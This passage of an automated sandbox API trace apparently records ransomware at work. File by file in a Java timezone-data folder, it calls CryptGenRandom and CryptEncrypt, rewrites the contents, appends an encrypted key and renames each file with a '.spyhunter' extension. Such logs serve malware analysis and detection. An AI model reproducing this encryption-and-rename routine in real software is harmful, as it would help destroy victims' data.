lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e5a4*=0x314, lpOverlapped=0x0) returned 1 [0170.101] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffcec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.101] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x314, lpNumberOfBytesWritten=0x270e5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e5a4*=0x314, lpOverlapped=0x0) returned 1 [0170.101] GetProcessHeap () returned 0x2c0000 [0170.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.101] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.101] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5a4, lpOverlapped=0x0 | out: lpBuffer=0x270e5e4*, lpNumberOfBytesWritten=0x270e5a4*=0x4, lpOverlapped=0x0) returned 1 [0170.104] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5a4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e5a4*=0x30, lpOverlapped=0x0) returned 1 [0170.104] CloseHandle (hObject=0xb0) returned 1 [0170.104] GetProcessHeap () returned 0x2c0000 [0170.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.104] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port-au-Prince.spyhunter") returned 76 [0170.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port-au-Prince" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port-au-prince"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port-au-Prince.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port-au-prince.spyhunter")) returned 1 [0170.105] GetProcessHeap () returned 0x2c0000 [0170.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.105] GetProcessHeap () returned 0x2c0000 [0170.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0170.105] GetProcessHeap () returned 0x2c0000 [0170.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04928 | out: hHeap=0x2c0000) returned 1 [0170.106] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5e0 | out: pbBuffer=0x270e5e0) returned 1 [0170.106] GetProcessHeap () returned 0x2c0000 [0170.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0170.106] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5d8*=0x30) returned 1 [0170.106] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Center" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\center"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0170.107] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Center") returned 71 [0170.107] StrStrW (lpFirst="Center", lpSrch=".txt") returned 0x0 [0170.107] GetProcessHeap () returned 0x2c0000 [0170.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.107] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e59c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e59c*=0x4fc, lpOverlapped=0x0) returned 1 [0170.166] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.166] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4fc, lpNumberOfBytesWritten=0x270e59c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e59c*=0x4fc, lpOverlapped=0x0) returned 1 [0170.166] GetProcessHeap () returned 0x2c0000 [0170.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.167] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.167] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e59c, lpOverlapped=0x0 | out: lpBuffer=0x270e5dc*, lpNumberOfBytesWritten=0x270e59c*=0x4, lpOverlapped=0x0) returned 1 [0170.167] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e59c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e59c*=0x30, lpOverlapped=0x0) returned 1 [0170.167] CloseHandle (hObject=0xb0) returned 1 [0170.167] GetProcessHeap () returned 0x2c0000 [0170.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.167] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Center.spyhunter") returned 81 [0170.167] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Center" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\center"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Center.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\center.spyhunter")) returned 1 [0170.168] GetProcessHeap () returned 0x2c0000 [0170.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.168] GetProcessHeap () returned 0x2c0000 [0170.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0170.168] GetProcessHeap () returned 0x2c0000 [0170.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7ccd8 | out: hHeap=0x2c0000) returned 1 [0170.169] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5e0 | out: pbBuffer=0x270e5e0) returned 1 [0170.169] GetProcessHeap () returned 0x2c0000 [0170.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0170.169] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5d8*=0x30) returned 1 [0170.169] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Beulah" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\beulah"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0170.170] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Beulah") returned 71 [0170.170] StrStrW (lpFirst="Beulah", lpSrch=".txt") returned 0x0 [0170.170] GetProcessHeap () returned 0x2c0000 [0170.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.170] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e59c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e59c*=0x4fc, lpOverlapped=0x0) returned 1 [0170.303] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.303] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4fc, lpNumberOfBytesWritten=0x270e59c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e59c*=0x4fc, lpOverlapped=0x0) returned 1 [0170.303] GetProcessHeap () returned 0x2c0000 [0170.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.303] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.304] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e59c, lpOverlapped=0x0 | out: lpBuffer=0x270e5dc*, lpNumberOfBytesWritten=0x270e59c*=0x4, lpOverlapped=0x0) returned 1 [0170.304] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e59c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e59c*=0x30, lpOverlapped=0x0) returned 1 [0170.304] CloseHandle (hObject=0xb0) returned 1 [0170.304] GetProcessHeap () returned 0x2c0000 [0170.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.304] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Beulah.spyhunter") returned 81 [0170.304] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Beulah" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\beulah"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Beulah.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\beulah.spyhunter")) returned 1 [0170.305] GetProcessHeap () returned 0x2c0000 [0170.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.305] GetProcessHeap () returned 0x2c0000 [0170.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0170.305] GetProcessHeap () returned 0x2c0000 [0170.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7cc00 | out: hHeap=0x2c0000) returned 1 [0170.306] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5d8 | out: pbBuffer=0x270e5d8) returned 1 [0170.306] GetProcessHeap () returned 0x2c0000 [0170.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0170.306] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5d0*=0x30) returned 1 [0170.306] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montevideo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montevideo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0170.306] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montevideo") returned 62 [0170.307] StrStrW (lpFirst="Montevideo", lpSrch=".txt") returned 0x0 [0170.307] GetProcessHeap () returned 0x2c0000 [0170.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.307] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e594, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e594*=0x480, lpOverlapped=0x0) returned 1 [0170.384] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.384] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x270e594, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e594*=0x480, lpOverlapped=0x0) returned 1 [0170.385] GetProcessHeap () returned 0x2c0000 [0170.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.385] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.385] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e594, lpOverlapped=0x0 | out: lpBuffer=0x270e5d4*, lpNumberOfBytesWritten=0x270e594*=0x4, lpOverlapped=0x0) returned 1 [0170.385] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e594, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e594*=0x30, lpOverlapped=0x0) returned 1 [0170.385] CloseHandle (hObject=0xb0) returned 1 [0170.385] GetProcessHeap () returned 0x2c0000 [0170.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.386] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montevideo.spyhunter") returned 72 [0170.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montevideo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montevideo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montevideo.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montevideo.spyhunter")) returned 1 [0170.387] GetProcessHeap () returned 0x2c0000 [0170.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.387] GetProcessHeap () returned 0x2c0000 [0170.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0170.387] GetProcessHeap () returned 0x2c0000 [0170.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4d80 | out: hHeap=0x2c0000) returned 1 [0170.387] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5d8 | out: pbBuffer=0x270e5d8) returned 1 [0170.387] GetProcessHeap () returned 0x2c0000 [0170.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0170.387] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5d0*=0x30) returned 1 [0170.387] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Moncton" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\moncton"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0170.388] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Moncton") returned 59 [0170.388] StrStrW (lpFirst="Moncton", lpSrch=".txt") returned 0x0 [0170.388] GetProcessHeap () returned 0x2c0000 [0170.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.389] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e594, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e594*=0x6c4, lpOverlapped=0x0) returned 1 [0170.401] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff93c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.401] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x6c4, lpNumberOfBytesWritten=0x270e594, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e594*=0x6c4, lpOverlapped=0x0) returned 1 [0170.401] GetProcessHeap () returned 0x2c0000 [0170.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.401] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.401] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e594, lpOverlapped=0x0 | out: lpBuffer=0x270e5d4*, lpNumberOfBytesWritten=0x270e594*=0x4, lpOverlapped=0x0) returned 1 [0170.401] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e594, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e594*=0x30, lpOverlapped=0x0) returned 1 [0170.401] CloseHandle (hObject=0xb0) returned 1 [0170.401] GetProcessHeap () returned 0x2c0000 [0170.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.401] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Moncton.spyhunter") returned 69 [0170.402] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Moncton" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\moncton"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Moncton.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\moncton.spyhunter")) returned 1 [0170.402] GetProcessHeap () returned 0x2c0000 [0170.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.402] GetProcessHeap () returned 0x2c0000 [0170.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0170.403] GetProcessHeap () returned 0x2c0000 [0170.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9100 | out: hHeap=0x2c0000) returned 1 [0170.403] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5d0 | out: pbBuffer=0x270e5d0) returned 1 [0170.403] GetProcessHeap () returned 0x2c0000 [0170.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0170.403] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5c8*=0x30) returned 1 [0170.404] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Menominee" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\menominee"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0170.404] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Menominee") returned 61 [0170.404] StrStrW (lpFirst="Menominee", lpSrch=".txt") returned 0x0 [0170.404] GetProcessHeap () returned 0x2c0000 [0170.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.404] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e58c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e58c*=0x4c0, lpOverlapped=0x0) returned 1 [0170.600] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.705] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x270e58c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e58c*=0x4c0, lpOverlapped=0x0) returned 1 [0170.705] GetProcessHeap () returned 0x2c0000 [0170.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.705] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.705] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e58c, lpOverlapped=0x0 | out: lpBuffer=0x270e5cc*, lpNumberOfBytesWritten=0x270e58c*=0x4, lpOverlapped=0x0) returned 1 [0170.705] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e58c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e58c*=0x30, lpOverlapped=0x0) returned 1 [0170.705] CloseHandle (hObject=0xb0) returned 1 [0170.705] GetProcessHeap () returned 0x2c0000 [0170.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.705] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Menominee.spyhunter") returned 71 [0170.705] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Menominee" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\menominee"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Menominee.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\menominee.spyhunter")) returned 1 [0170.707] GetProcessHeap () returned 0x2c0000 [0170.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.707] GetProcessHeap () returned 0x2c0000 [0170.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0170.707] GetProcessHeap () returned 0x2c0000 [0170.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4998 | out: hHeap=0x2c0000) returned 1 [0170.707] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5d0 | out: pbBuffer=0x270e5d0) returned 1 [0170.707] GetProcessHeap () returned 0x2c0000 [0170.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0170.707] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5c8*=0x30) returned 1 [0170.707] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Martinique" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\martinique"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0170.708] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Martinique") returned 62 [0170.708] StrStrW (lpFirst="Martinique", lpSrch=".txt") returned 0x0 [0170.708] GetProcessHeap () returned 0x2c0000 [0170.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.708] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e58c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e58c*=0x59, lpOverlapped=0x0) returned 1 [0170.754] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffa7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.754] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x270e58c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e58c*=0x59, lpOverlapped=0x0) returned 1 [0170.801] GetProcessHeap () returned 0x2c0000 [0170.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.801] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.801] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e58c, lpOverlapped=0x0 | out: lpBuffer=0x270e5cc*, lpNumberOfBytesWritten=0x270e58c*=0x4, lpOverlapped=0x0) returned 1 [0170.801] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e58c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e58c*=0x30, lpOverlapped=0x0) returned 1 [0170.801] CloseHandle (hObject=0xb0) returned 1 [0170.801] GetProcessHeap () returned 0x2c0000 [0170.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.802] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, 